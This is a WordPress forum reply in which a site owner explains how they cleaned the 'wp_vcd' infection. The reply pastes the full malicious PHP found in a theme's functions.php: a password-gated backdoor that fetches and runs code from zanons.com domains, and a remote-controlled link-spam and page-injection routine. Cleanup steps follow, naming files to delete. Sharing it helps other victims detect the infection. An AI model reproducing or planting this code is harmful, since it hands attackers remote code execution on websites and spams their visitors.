pacio88
Forum Replies Created
Viewing 1 replies (of 1 total)
-
Forum: Fixing WordPress
In reply to: wp-feed.phpHey,
I have the same issue and this topic helped me to solve it – thanks!
Below what is I did:
– change all your passwords for all your WP’s, FTP, database
– for each installed WP’s (I had few), go to wp-content/themes/YOURTHEME/functions.php and check, if the front of the code is not suspicious. Mine looks like below:<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'ac043657a4e80d5afcce1c523ad9e8c0')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?php\n" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='08b370e35d008b6591dd40b0eec23025'; if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?><?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '207025345d762fe3f77e7d5b3e5664a5')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n"; } break; case 'set_id_links'; if (isset($_REQUEST['data'])) { $data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"'); $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content); if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>'; if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false) { print "true"; } } break; case 'create_page'; if (isset($_REQUEST['remove_page'])) { if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"')) { print "true"; } } elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content'])) { if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"')) { print "true"; } } break; default: print "ERROR_WP_ACTION WP_URL_CD"; } die(""); } if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' ) { $data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"'); if ($data -> full_content) { print stripslashes($data -> content); } else { print '<!DOCTYPE html>'; print '<html '; language_attributes(); print ' class="no-js">'; print '<head>'; print '<title>'.stripslashes($data -> title).'</title>'; print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />'; print '<meta name="Description" content="'.stripslashes($data -> description).'" />'; print '<meta name="robots" content="index, follow" />'; print '<meta charset="'; bloginfo( 'charset' ); print '" />'; print '<meta name="viewport" content="width=device-width">'; print '<link rel="profile" href="http://gmpg.org/xfn/11">'; print '<link rel="pingback" href="'; bloginfo( 'pingback_url' ); print '">'; wp_head(); print '</head>'; print '<body>'; print '<div id="content" class="site-content">'; print stripslashes($data -> content); get_search_form(); get_sidebar(); get_footer(); } exit; } ?>– delete the maleware beginning
– go to /wp-includes and check if you have some of those files:- wp-tmp.php
- wp-vcd.php
- wp-feed.php
- wp-cd.php
If yes – check them, they are probably maleware so delete it.
– check your website if the problem still occurs
– install Wordfence plugin and check your website once again 😉
Viewing 1 replies (of 1 total)